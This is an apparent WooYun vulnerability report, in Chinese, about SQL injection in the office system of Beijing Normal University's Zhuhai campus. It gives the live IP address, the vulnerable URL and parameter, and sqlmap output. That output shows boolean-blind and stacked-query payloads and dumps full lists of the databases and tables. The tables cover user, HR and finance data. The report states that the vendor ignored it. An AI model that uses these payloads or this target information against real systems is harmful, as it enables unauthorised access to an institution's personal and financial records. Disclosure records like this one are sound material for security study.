乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-24: 细节已通知厂商并且等待厂商处理中 2015-12-29: 厂商已经主动忽略漏洞,细节向公众公开
RT
北京师范大学珠海分校区办公系统SQL注入记得还有什么任意上传GETSHELL的都自检一下吧,这里只是注入~~
地址:http://59.38.32.31:8080/login/index.jsp
注入URL:http://59.38.32.31:8080/showphoto.xf?photoid=126
sqlmap identified the following injection points with a total of 50 HTTP(s) requests:---Parameter: photoid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: photoid=126 AND 6987=6987 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: photoid=126;WAITFOR DELAY '0:0:5'-----web application technology: Servlet 2.4, Tomcat 4.0.4.back-end DBMS: Microsoft SQL Server 2008available databases [9]:[*] FE_APP5[*] FE_BASE5[*] FE_ERP[*] master[*] model[*] msdb[*] ReportServer$FEOA[*] ReportServer$FEOATempDB[*] tempdb
表好多,就没跑下去了。。。
Database: FE_ERP[159 tables]+------------------------+| ERP_ACCOUNT_INFO || ERP_APIRUN_INFO || ERP_API_INFO || ERP_API_VO_DETAIL || ERP_API_VO_INFO || ERP_COLFE_DETAIL || ERP_DATA_TEST_DETAIL || ERP_DATA_TEST_INFO || ERP_FE_DETAIL || ERP_FE_INFO || ERP_FE_MAPING || ERP_HISTORY_DETAIL || ERP_HISTORY_INFO || ERP_MESSAGE_INFO || ERP_ONEKEY_DETAIL || ERP_ONEKEY_INFO || ERP_ORG_HISTORY || ERP_ORG_HISTORY_DETAIL || ERP_ORG_SET || ERP_ORG_SET1 || ERP_REGISTER_LOGIC || ERP_SYNCFILTER_DETAIL || ERP_SYNCFILTER_INFO || ERP_SYNCTYPE_INFO || ERP_SYNC_DETAIL || ERP_SYNC_INFO || ERP_SYNC_ORG || ERP_TABLE_INFO || ERP_TCOLS_INFO || ERP_TEMPLATE_DETAIL || ERP_TEMPLATE_INFO || NC_ARAP_DJFB || NC_ARAP_DJFKXYB || NC_ARAP_DJLX || NC_ARAP_DJZB || NC_ARAP_ITEM || NC_BD_ACCSUBJ || NC_BD_ADDRESS || NC_BD_AREACL || NC_BD_BALATYPE || NC_BD_BANKACCBAS || NC_BD_BDINFO || NC_BD_BILLTYPE || NC_BD_BUSITYPE || NC_BD_CALBODY || NC_BD_CASHFLOW || NC_BD_COMABSTR || NC_BD_CORP || NC_BD_COSTSUBJ || NC_BD_CUBASDOC || NC_BD_CUMANDOC || NC_BD_CURRRATE || NC_BD_CURRTYPE || NC_BD_CUSTADDR || NC_BD_CUSTBANK || NC_BD_DEPTDOC || NC_BD_GLORG || NC_BD_GLORGBOOK || NC_BD_INVBASDOC || NC_BD_INVCL || NC_BD_INVMANDOC || NC_BD_JOBBASFIL || NC_BD_MEASDOC || NC_BD_NOTETYPE || NC_BD_PAYTERM || NC_BD_PSNBASDOC || NC_BD_PSNCL || NC_BD_PSNDOC || NC_BD_SALESTRU || NC_BD_SENDTYPE || NC_BD_STORDOC || NC_BD_SUBJASS || NC_BD_TAXITEMS || NC_BD_VOUCHERTYPE || NC_CMP_BUSIBILL || NC_CMP_BUSIBILL_B || NC_CUSTOMER_SYNC || NC_DEPTDOC_SYNC || NC_ER_REIMTYPE || NC_HI_PSNDOC_DEPTCHG || NC_INVCL_SYNC || NC_INVENTORY_SYNC || NC_LEAVE_TYPE || NC_LOAN_APPLY || NC_MEANS_SYNC || NC_OM_DUTY || NC_OM_JOB || NC_PO_PRAYBILL || NC_PO_PRAYBILL_B || NC_SALESTRU_SYNC || NC_SALE_APPLY || NC_SALE_APP_SUB || NC_SM_CODETOCODE || NC_SM_CREATECORP || NC_SM_USER || NC_SM_USERANDCLERK || NC_SM_USER_ROLE || NC_SO_INVTOCALBODY || NC_SUBJECT_ASSIST || NC_SUBJECT_ASSISTS || NC_SUBJECT_SYNC || NC_TBM_AWAYB || NC_TBM_AWAYH || NC_TBM_PSNDOC || NC_TBM_TIMEITEM || OA_JKD || U8_AA_AGREEMENT || U8_AA_ENUM || U8_AP_CLOSEBILL || U8_AP_CLOSEBILLS || U8_AP_VOUCH || U8_AP_VOUCHS || U8_CM_GROUP || U8_CODE || U8_COMPUTATIONUNIT || U8_CUSTOMER || U8_DEPARTMENT || U8_DISPATCHLIST || U8_DISPATCHLISTS || U8_DSIGN || U8_EXCH || U8_FITEM || U8_FITEMSS00 || U8_FITEMSS97 || U8_FITEMSS97CLASS || U8_FITEMSS98 || U8_FOREIGNCURRENCY || U8_GL_ACCVOUCH || U8_GL_ACCVOUCHS || U8_GRADEDEF || U8_HR_HI_JOBINFO || U8_HR_HI_PERSON || U8_HR_OM_JOB || U8_INVENTORY || U8_PAYCONDITION || U8_PO_PODETAILS || U8_PO_POMAIN || U8_PURCHASETYPE || U8_PU_APPVOUCH || U8_PU_APPVOUCHS || U8_PU_ARRIVALVOUCH || U8_PU_ARRIVALVOUCHS || U8_RDRECORD01 || U8_RDRECORDS01 || U8_RD_STYLE || U8_SALETYPE || U8_SA_CUSUPRICE || U8_SETTLESTYLE || U8_SHIPPINGCHOICE || U8_SO_SODETAILS || U8_SO_SOMAIN || U8_UA_MENU || U8_UA_USER || U8_VENDOR || U8_VOUCHERNUMBER || U8_WAREHOUSE || V_ERP_API_VO_DETAIL || V_SYNC_DEPLOY || dtproperties |+------------------------+
Database: FE_BASE5[307 tables]+------------------------------+| ABC || APPRV_FLOW || APPRV_FLOW_INT || APPRV_FLOW_RES || APPRV_FLOW_SUB || APPRV_RESOURCE || APPRV_RESOURCE_SUB || APP_LEADER_ADD || APP_LEADER_ADD_V || APP_LEADER_CALENDAR || APP_LEADER_SUB || ARRANGE_CALENDAR || ASSET || ASSET_USE || ASSET_V || CALENDAR || CHAT || COMMON_LEMMA || COMMON_LEMMA_V || CTRLDATATYPE_VIEW || CTRLPROPERTY_VIEW || DEFINEGROUP_V || DESKTOP_CONFIG_V || DESKTOP_CONTAINER || DESKTOP_CONTAINER_GADGET || DESKTOP_CONTAINER_USER || DESKTOP_GADGET || DESKTOP_MENU_MANAGEMENT || DESKTOP_MENU_MANAGEMENT_TEMP || DESKTOP_PEOPLE_PLUGIN || DESKTOP_PLUGIN_MANAGEMENT || DESKTOP_PLUGIN_SETTING || DESKTOP_SET || DESK_USERJJCD || DOCUMENTS_LIST || DRAFT_CONFIG_V || DRAFT_MENU_V || DRAFT_SET || ENTERPRISE_SMS || FACEITEM_V || FACE_V || FE_LOG || FE_USERS || FLOWCODE_CONFIG || FLOWCODE_VALUE || FLOW_CLASS_SET || FLOW_MENU_V || FOLDER_ATTRIBUTE || FOLDER_POPUDOM || FOLDER_TYPE || FUNCTION_TABLE_V || GONGGAOVIEW_V || GONGGAO_DESK_V || GROUP_ROLE_USER_V || GROUP_ROLE_V || GROUP_USER_LEVEL_V || GROUP_USER_SORT_V || GROUP_USER_V || GROUP_U_V_D || G_R_U_YZ_V || IDEAMANAGE || INFOR_YIBAN || LAYOUT_VIEW || LEADER_APP_V || LEADER_CALENDAR_V || MESSAGEINFOR || MESSAGEINFOR_HISTORY || MESSAGE_SET_V || MESSAGE_USER_V || MODEL_NODE_ALL_V || MODEL_NODE_R_V || NC_SYN_HISTORY || NC_SYN_HISTORY_DETAIL || NC_SYN_ORG || NEWBIE || NEWSVIEW_V || NEWS_DESK_V || PHONE_LOGIN || PLURALIST_POST_V || PORTAL_CONTAINER || PORTAL_INFO || PORTAL_PLUGIN || PORTAL_PLUGINS || PORTAL_PN_POLICY || PORTAL_PN_POLICY_SUB || PORTAL_PN_POPUDOM || PORTAL_PN_SETUP || PORTAL_PP_CONFIG || PORTAL_PP_CONFIG_SUB || PORTAL_SETTINGS || PORTAL_SETTINGS_DETAILS || PORTAL_SHOW_DEFAULT || PORTAL_TEMPLATE || PORTAL_USERS || PROXY_NODE || PROXY_SET || PROXY_V || QUICK_CONFIG_V || RECENT_MENU_V || REFERENCE_UNION || REPORT_ELEMENT || REPORT_FACEPROMPT_INFOR || REPORT_SET || RESEARCH_OPTION || RESEARCH_PUBLISHER || RESEARCH_SUB || RESEARCH_TOPIC || RESEARCH_TOPIC_V || RESEARCH_VOTER || RESOURCE_INFO || RESOURCE_LIST || RESOURCE_REG_SET || RESOURCE_USE_SET || RICHENG || RICHENG_LEADER_V || ROW_POPEDOM_V || SEARCH_CONFIG || SFGL_FFGL_V || SMS_DRFTBL || SMS_IBXTBL || SMS_ORDTBL || SMS_SNTTBL || SMS_TOTTBL || SORT_INFOR || SORT_LINK_FIELD || SORT_VIEW || STAFF_GROUP_USER_V || STAMP_KEY_RELATION || STOCKSP || STOCKSP_VIEW || STOCK_SUB || STOCK_SUB_TMP || SYS_ATTACHMENT || SYS_BIZLOGIC || SYS_CACHET || SYS_CACHETASSIGN || SYS_COLLABORATIVE || SYS_COLLABORATIVE_MODIFY || SYS_COLLABORATIVE_MOUDLE || SYS_CONTROL || SYS_CTRLDATATYPE || SYS_CTRLPROPERTY || SYS_CTRLPROPS || SYS_CTRLPROPVIEW || SYS_DATABASE || SYS_DATALINK || SYS_DATATYPE || SYS_DFGROUP || SYS_DGR || SYS_DOC_MEMU || SYS_DOC_SIGNATURE || SYS_DRIVER || SYS_DUTY || SYS_EMAILINFO || SYS_EVENT || SYS_EVENT_PAGE || SYS_EXCEPTION || SYS_EXTURL || SYS_FACE || SYS_FACECTRLPROP || SYS_FACEDATABUF || SYS_FACEEVENT || SYS_FACEFILE || SYS_FACEITEM || SYS_FACEPROMPT || SYS_FACEPROP || SYS_FACE_V || SYS_FAVORITE || SYS_FCSTYLE || SYS_FIELD || SYS_FILEBUFFER || SYS_FLOWTYPE || SYS_FORM_INFO || SYS_FUNCTION || SYS_FUNCTION_USER || SYS_FUNCTION_temp || SYS_GROUP || SYS_GROUP_LOG || SYS_GROUP_TEMP || SYS_GROUP_USER || SYS_HOLIDAY || SYS_INDEX || SYS_IPLOGIN_RULE || SYS_IPNOTVERIFY || SYS_JGSTAMP || SYS_JGSTAMP_KEY || SYS_JGSTAMP_RELATION || SYS_LOG || SYS_LOGINKEY || SYS_LOG_SETUP || SYS_MESSAGES || SYS_MOBILEINFO || SYS_MON_RIGHT || SYS_MWF || SYS_MWF_V || SYS_PAGE || SYS_PLUGINS || SYS_PLURALIST || SYS_POPEDOM_COLUMN || SYS_POPEDOM_ROW || SYS_POPEDOM_TEMPLET || SYS_POPEDOM_TEMP_SUB || SYS_QUERY_SETUP || SYS_REDIRECT || SYS_REGISTER || SYS_ROLE || SYS_SELT_LOGIC || SYS_STAMP || SYS_STAMPCA || SYS_STAMPTYPE || SYS_TABLE || SYS_TABLE_KEY || SYS_TEST || SYS_TEST_FE35_PRO || SYS_TEST_SUB || SYS_TRACK_SETUP || SYS_TRACK_SETUP_SUB || SYS_TRACK_VO || SYS_TRACK_VO_SUB || SYS_USERS || SYS_USER_CONFIG || SYS_USER_ROLE || SYS_USER_SKIN || SYS_USER_STATUS || SYS_USER_TEMPLET || SYS_VIEWSQL || SYS_WORKTIME || TABLE_FIELD_V || TABLE_SORT_V || TABLE_V || TASK_FFGL_V || TASK_INOFR_USER_V || TASK_SFGL_V || TASK_SUPERVISORY_V || TASK_USER_V || TEMPLET_GROUP_V || TESTSDDS || TRUSTDEVICELIST || USER_DESKTOP_CONFIG || USER_DESKTOP_RECENT || USER_DOC_LIST || USER_EVENT || USER_EVENT_V || USER_GROUP_DEFAULT || USER_GROUP_LEFT_V || USER_GROUP_V || USER_G_L_V || USER_LOAD_V || USER_RELAPER_SUB || USER_RELATION_PER || USER_ROLE_V || USER_R_V || USER_TEMPLET_V || VACATION || VIEW_CALENDAR || VIEW_DAIBAN || V_ARRANGE_CALENDAR || V_LEADER_SET || V_RELATION_PER || WF_ACTION || WF_CLASS || WF_CO_MODEL || WF_CO_NODE || WF_DEFAULT_CONFIG || WF_DOC_ADDITIONAL || WF_FLOWPIC || WF_INFOR || WF_INFOR_HURRY || WF_INFOR_V || WF_INFOR_XY_V || WF_LIGHT || WF_LIGHT_CONFIG || WF_LINKS || WF_MODEL || WF_MONITOR_DATA || WF_MONITOR_SELECTOR || WF_MONITOR_SETUP || WF_MONITOR_SETUP_FLOW || WF_NODES || WF_NODE_TRACE || WF_ROLES || WF_ROLE_ALLOC || WF_SUBFLOW_BO_MAP || WF_SUBFLOW_CONF || WF_SUPERVISORY || WF_TASK || WF_TASK_TRACER || WF_TASK_TRACER_V || WITSETLIST || WORKED_NODEINFO || WORKFLOW_USER_V || WORKPLAN || WORKPLAN_MOUDLE || WORKPLAN_V || WORK_AGE_SET || WORK_LOG || WORK_LOG_V || WORK_TAG || XML_TABLE_CONF || XML_TABLE_FILTER || XML_TABLE_SUB || XY_USER_ROLE_V || dtproperties || group_aaa_temp || hack || sqlmapoutput || temp_split |+------------------------------+
修复
危害等级:无影响厂商忽略
忽略时间:2015-12-29 17:38
漏洞Rank:4 (WooYun评价)
暂无
